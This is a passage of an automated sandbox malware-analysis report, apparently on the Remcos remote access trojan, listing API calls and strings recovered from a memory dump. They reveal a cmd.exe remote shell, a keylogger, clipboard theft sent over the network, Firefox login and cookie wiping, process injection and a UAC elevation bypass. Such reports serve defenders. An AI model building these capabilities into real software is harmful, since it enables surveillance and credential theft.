                                                                                        • __Init_thread_footer.LIBCMT ref: 00405723
                                                                                        • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660BC,00000000), ref: 004057B6
                                                                                        • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                                                                                        • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                                                                        • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                                                                        • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                                                                                        • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                                                                          • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                                                                        • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90,004660C0,00000062,004660A4), ref: 004059E4
                                                                                        • Sleep.KERNEL32(00000064,00000062,004660A4), ref: 004059FE
                                                                                        • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                                                                        • CloseHandle.KERNEL32 ref: 00405A23
                                                                                        • CloseHandle.KERNEL32 ref: 00405A2B
                                                                                        • CloseHandle.KERNEL32 ref: 00405A3D
                                                                                        • CloseHandle.KERNEL32 ref: 00405A45
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                                        • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                                                                        • API String ID: 2994406822-18413064
                                                                                        • Opcode ID: 0423482584964133d0d19e65db76f813d50334c39a223a4c681c84889f8ac799
                                                                                        • Instruction ID: 70e6a120cd26ef4d63fea04585a98dfb86eec3f3f3d93349c630b188a9e88b71
                                                                                        • Opcode Fuzzy Hash: 0423482584964133d0d19e65db76f813d50334c39a223a4c681c84889f8ac799
                                                                                        • Instruction Fuzzy Hash: 8891E471604604AFD711FB36ED42A6F369AEB84308F01443FF989A62E2DB7D9C448B5D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004120F7 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 238threadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetCurrentProcessId.KERNEL32 ref: 00412106
                                                                                          • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                                                                          • Part of subcall function 00413877: RegSetValueExA.ADVAPI32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                                                                                          • Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                                                                                        • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00412146
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00412155
                                                                                        • CreateThread.KERNEL32(00000000,00000000,004127EE,00000000,00000000,00000000), ref: 004121AB
                                                                                        • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041241A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                                                                        • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                                                                        • API String ID: 3018269243-13974260
                                                                                        • Opcode ID: 1b0d93be84d51118ccd1b6052d9a017b8cd45349acbaf203cacd4182d68b5e1b
                                                                                        • Instruction ID: 8205490d34a3093c97c97cf0412c87f535f0d81ed9353c04b1464aab831027f3
                                                                                        • Opcode Fuzzy Hash: 1b0d93be84d51118ccd1b6052d9a017b8cd45349acbaf203cacd4182d68b5e1b
                                                                                        • Instruction Fuzzy Hash: 2671813160430167C614FB72CD579AE73A4AF90308F50057FB546A61E2FFBC9949C69E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040BB30 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 146fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBAF
                                                                                        • FindClose.KERNEL32(00000000), ref: 0040BBC9
                                                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 0040BCEC
                                                                                        • FindClose.KERNEL32(00000000), ref: 0040BD12
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Find$CloseFile$FirstNext
                                                                                        • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                                        • API String ID: 1164774033-3681987949
                                                                                        • Opcode ID: e60ef44db30208dd2162595bb00c9bb932e2c9896fc53afd5e517d704f3508ac
                                                                                        • Instruction ID: 0369a90be492857ee26322cec2c2e6bc6ddf3692cf68474a737f8ca2a3b0d98c
                                                                                        • Opcode Fuzzy Hash: e60ef44db30208dd2162595bb00c9bb932e2c9896fc53afd5e517d704f3508ac
                                                                                        • Instruction Fuzzy Hash: 13516E3190421A9ADB14F7B2DC56DEEB739AF11304F10057FF406721E2EF785A89CA89
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004168C1 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 80clipboardmemoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • OpenClipboard.USER32 ref: 004168C2
                                                                                        • EmptyClipboard.USER32 ref: 004168D0
                                                                                        • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004168F0
                                                                                        • GlobalLock.KERNEL32(00000000), ref: 004168F9
                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0041692F
                                                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00416938
                                                                                        • CloseClipboard.USER32 ref: 00416955
                                                                                        • OpenClipboard.USER32 ref: 0041695C
                                                                                        • GetClipboardData.USER32(0000000D), ref: 0041696C
                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00416975
                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                                                                                        • CloseClipboard.USER32 ref: 00416984
                                                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                                        • String ID: !D@
                                                                                        • API String ID: 3520204547-604454484
                                                                                        • Opcode ID: 7bdf44ed23baddef4cf62a28d7db66ec7c3cdf26bf7aa0f36eb4a81407acbbaf
                                                                                        • Instruction ID: 9e7c9e91df33a813dd3aefbd505e3631e00017b2d00f6ad0929271c723fa7fba
                                                                                        • Opcode Fuzzy Hash: 7bdf44ed23baddef4cf62a28d7db66ec7c3cdf26bf7aa0f36eb4a81407acbbaf
                                                                                        • Instruction Fuzzy Hash: 9F212171604301DBD714BB71DC5DABE36A9AF88746F40043EF946921E2EF3C8D45C66A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040BD37 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 131fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDAF
                                                                                        • FindClose.KERNEL32(00000000), ref: 0040BDC9
                                                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 0040BE89
                                                                                        • FindClose.KERNEL32(00000000), ref: 0040BEAF
                                                                                        • FindClose.KERNEL32(00000000), ref: 0040BED0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Find$Close$File$FirstNext
                                                                                        • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                        • API String ID: 3527384056-432212279
                                                                                        • Opcode ID: 5d0565dfd04f48ee80346224fd960d4021310761f6a296d7b61b1ca4d4d71a86
                                                                                        • Instruction ID: daa8673b40617291cefb90f55d029d970aaced9502edc59260dc825ad40fac9f
                                                                                        • Opcode Fuzzy Hash: 5d0565dfd04f48ee80346224fd960d4021310761f6a296d7b61b1ca4d4d71a86
                                                                                        • Instruction Fuzzy Hash: 38417D3190021AAADB04F7A6DC5A9EEB769DF11704F50017FF506B20D2EF385A46CA9E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004132D2 Relevance: 18.2, APIs: 12, Instructions: 153fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413417
                                                                                        • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413425
                                                                                        • GetFileSize.KERNEL32(?,00000000), ref: 00413432
                                                                                        • UnmapViewOfFile.KERNEL32(00000000), ref: 00413452
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0041345F
                                                                                        • CloseHandle.KERNEL32(?), ref: 00413465
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                                                                        • String ID:
                                                                                        • API String ID: 297527592-0
                                                                                        • Opcode ID: 52b6b7bb2cc7c70124f03fd4dd600c064b869f903e3e72a7e1b27baf9a98f7f1
                                                                                        • Instruction ID: 9e0538afe5582c7c3c7070a3da709670e2bb39b60280b40541f30be5467d1837
                                                                                        • Opcode Fuzzy Hash: 52b6b7bb2cc7c70124f03fd4dd600c064b869f903e3e72a7e1b27baf9a98f7f1
                                                                                        • Instruction Fuzzy Hash: ED41E631108305BBD7109F25DC4AF6B3BACEF89726F10092AFA14D51A2DF38DA40C66E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040F474 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 210processCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F48E
                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4B9
                                                                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F4D5
                                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F554
                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00475338), ref: 0040F563
                                                                                          • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                                                                          • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                                                                        • CloseHandle.KERNEL32(00000000,?,00475338), ref: 0040F66E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                                                                        • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                                                                        • API String ID: 3756808967-1743721670
                                                                                        • Opcode ID: 7f89ee10989f3bd4abeff3972d4c872612047b4c43f3230c1fb09e73b354777b
                                                                                        • Instruction ID: b3f00c97eb68dcc530bbf6735eb7028ff3362e05d7342ed3a56d945b0ce45bff
                                                                                        • Opcode Fuzzy Hash: 7f89ee10989f3bd4abeff3972d4c872612047b4c43f3230c1fb09e73b354777b
                                                                                        • Instruction Fuzzy Hash: F6715E705083419BC724FB21D8959AEB7A5AF90348F50083FF586631E3EF78994ECB5A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00419627 Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 206COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 0$1$2$3$4$5$6$7$VG
                                                                                        • API String ID: 0-1861860590
                                                                                        • Opcode ID: 41b7ed3079968531247989beadbe1f0bf299f88a528c0936b597c9f8fef39dcf
                                                                                        • Instruction ID: 08acf1e0be570df0aadc768861284cd9b307e7e5fc43d41925289fb9f64992c1
                                                                                        • Opcode Fuzzy Hash: 41b7ed3079968531247989beadbe1f0bf299f88a528c0936b597c9f8fef39dcf
                                                                                        • Instruction Fuzzy Hash: A771B2709183019FD304EF21D862BAB7B94DF95310F10492FF5A26B2D1DF78AA49CB96
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004074FD Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 56COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _wcslen.LIBCMT ref: 00407521
                                                                                        • CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Object_wcslen
                                                                                        • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                                        • API String ID: 240030777-3166923314
                                                                                        • Opcode ID: a3f0521951bb9342bb967e70cc438d07290dcccf7f3efa3b8b817ec6fb2293fa
                                                                                        • Instruction ID: 36c1a35fc662e139fbe0c3856e6c09b73c1590006896ac343f6f9e6a2f87480d
                                                                                        • Opcode Fuzzy Hash: a3f0521951bb9342bb967e70cc438d07290dcccf7f3efa3b8b817ec6fb2293fa
                                                                                        • Instruction Fuzzy Hash: 1D115172D04218BAD710E6959C45ADEB7A89B08714F15007BF904B2282E77CAA4486BA
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0041A748 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A75E
                                                                                        • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A7AD
                                                                                        • GetLastError.KERNEL32 ref: 0041A7BB
                                                                                        • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A7F3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                                        • String ID:
                                                                                        • API String ID: 3587775597-0
                                                                                        • Opcode ID: 9206af50c139a4972f8ad6fd42bba56160b21ad091b1fa9e470d4b003cbebb8b
                                                                                        • Instruction ID: 0905bbee584710e72bd43cf86ffd47af08151029a50ddcda7611e9b1cb6672f7
                                                                                        • Opcode Fuzzy Hash: 9206af50c139a4972f8ad6fd42bba56160b21ad091b1fa9e470d4b003cbebb8b
                                                                                        • Instruction Fuzzy Hash: A1815F71104305ABC304EB61D885DAFB7A8FF94749F50092FF585521A2EF78EE48CB9A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00452610 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 188COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                                                                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                                                                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                                                          • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                                                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281
                                                                                        • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045271C
                                                                                        • IsValidCodePage.KERNEL32(00000000), ref: 00452777
                                                                                        • IsValidLocale.KERNEL32(?,00000001), ref: 00452786
                                                                                        • GetLocaleInfoW.KERNEL32(?,00001001,lJD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 004527CE
                                                                                        • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 004527ED
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                        • String ID: lJD$lJD$lJD
                                                                                        • API String ID: 745075371-479184356
                                                                                        • Opcode ID: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                                                                                        • Instruction ID: 5597d49bf91f8be5c1e88387600e3254545b136a20640e737b6730ed74bf2304
                                                                                        • Opcode Fuzzy Hash: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                                                                                        • Instruction Fuzzy Hash: 87518371900205ABDF10DFA5CD41ABF77B8AF19702F14047BFD04E7292E7B899488B69
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040C34D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 112fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C39B
                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0040C46E
                                                                                        • FindClose.KERNEL32(00000000), ref: 0040C47D
                                                                                        • FindClose.KERNEL32(00000000), ref: 0040C4A8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Find$CloseFile$FirstNext
                                                                                        • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                        • API String ID: 1164774033-405221262
                                                                                        • Opcode ID: d5ab99d5c8e703f78ba660c786112f6639adf047d7ea79dcf4c979a680208b30
                                                                                        • Instruction ID: 975c513e22faa42ee1994afe11ceef4a5d9ff9fa3a88a4f7cb3cdca8b35e8719
                                                                                        • Opcode Fuzzy Hash: d5ab99d5c8e703f78ba660c786112f6639adf047d7ea79dcf4c979a680208b30
                                                                                        • Instruction Fuzzy Hash: 4131513150021AA6CB14E7A1DC9ADFE7778AF10718F10017FB105B20D2EF789A49CA4D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040A2B8 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 63windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A2D3
                                                                                        • SetWindowsHookExA.USER32(0000000D,0040A2A4,00000000), ref: 0040A2E1
                                                                                        • GetLastError.KERNEL32 ref: 0040A2ED
                                                                                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040A33B
                                                                                        • TranslateMessage.USER32(?), ref: 0040A34A
                                                                                        • DispatchMessageA.USER32(?), ref: 0040A355
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                                        • String ID: Keylogger initialization failure: error $`#v
                                                                                        • API String ID: 3219506041-3226811161
                                                                                        • Opcode ID: a226280b9444fdc9d85a987e0cc9a01563434beb77e8bedbb690ae4a652fbc74
                                                                                        • Instruction ID: 26c2bdf112627336efb266b6f5317542b4ef4d62b82d8858756ad59ca9dca42a
                                                                                        • Opcode Fuzzy Hash: a226280b9444fdc9d85a987e0cc9a01563434beb77e8bedbb690ae4a652fbc74
                                                                                        • Instruction Fuzzy Hash: FA11BF32604301ABCB107F76DC0A86B77ECEA95716B10457EFC85E21D1EA38C910CBAA
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0041C291 Relevance: 13.6, APIs: 9, Instructions: 106fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00474EE0,?), ref: 0041C2EC
                                                                                        • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00474EE0,?), ref: 0041C31C
                                                                                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00474EE0,?), ref: 0041C38E
                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C39B
                                                                                          • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C371
                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,00474EE0,?), ref: 0041C3BC
                                                                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D2
                                                                                        • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D9
                                                                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3E2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                        • String ID:
                                                                                        • API String ID: 2341273852-0
                                                                                        • Opcode ID: 5daa9100e03deb39a4691b7b17906df9641a5acb862147602035c05749f1dd0e
                                                                                        • Instruction ID: c19bc5cae20e4253aafd1d57f534f4f4794eeb6ee7264df4fdb3445c687e6cd6
                                                                                        • Opcode Fuzzy Hash: 5daa9100e03deb39a4691b7b17906df9641a5acb862147602035c05749f1dd0e
                                                                                        • Instruction Fuzzy Hash: 1331827294031CAADB24E7A1DC88EDB736CAF04305F4405FBF955D2152EB39DAC88B68
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00419AF5 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 245fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNEL32(00000000,?), ref: 00419D4B
                                                                                        • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419E17
